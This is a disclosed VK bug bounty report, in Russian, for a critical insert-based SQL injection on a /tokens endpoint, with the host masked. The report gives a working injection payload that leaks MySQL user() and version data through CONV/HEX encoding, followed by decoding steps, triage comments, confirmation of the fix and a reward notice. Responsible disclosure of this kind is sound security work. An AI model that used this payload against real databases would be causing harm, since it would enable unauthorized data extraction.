[
{%mask_value%}
] SQL injection insert based

  1. Заходим сюда https://
    {%mask_value%}
    /tokens
  2. Кликаем сгенерировать и вводим имя
  3. Перехватываем запрос и вставляем следующий пейлоад
 1'*CONV(HEX(SUBSTRING((SELECT user() LIMIT 1), 1, 8)), 16, 10)*1);-- -'
  1. Снова идём на https://
    {%mask_value%}
    /tokens, берём полученное число и вставляем например тут (https://www.calculator.net/scientific-notation-calculator.html), чтобы убрать 'e'
  2. С полученным числом идём сюда https://sql-academy.org/ru/sandbox и выполняем запрос
SELECT unhex(conv(*yournumber*, 10, 16));
Mysql user: SELECT unhex(conv(8030591446374774000, 10, 16));
Mysql version: SELECT unhex(conv(4048226090021826000, 10, 16));
Вознаграждение
30 000 ₽
Все другое
VK
№ отчета: 5
Создан: 07 августа, 08:41
Автор: kedr
Статус: Исправлено
Тип: Об уязвимости
Уровень:
Критический
Комментарии
От
p.uvarov
18 ноября 2022
Благодарим вас за отчет, отправленный в Bug Bounty VK!
Мы ценим ваше время и то, что вы помогаете сделать наши веб-сервисы более безопасными.
Ваше сообщение прошло первичную проверку и было передано инженеру по безопасности.
Инженер по безопасности свяжется с вами только в том случае, если возникнут вопросы по воспроизведению ошибки или потребуется дополнительная информация от вас. Инженер будет управлять процессом исправления.
Как только ошибка будет полностью исправлена, отчет будет переведен в состояние "Исправлено", что может занять некоторое время.
От
p.uvarov
18 ноября 2022
От
p.uvarov
21 ноября 2022
@kedr, привет!
Мы исправили уязвимость. Пожалуйста, подтверди отсутствие.
От
p.uvarov
21 ноября 2022
От
kedr
21 ноября 2022
Пофикшено
От
p.uvarov
21 ноября 2022
От
VK
22 ноября 2022
Начислено вознаграждение: 30 000,00 ₽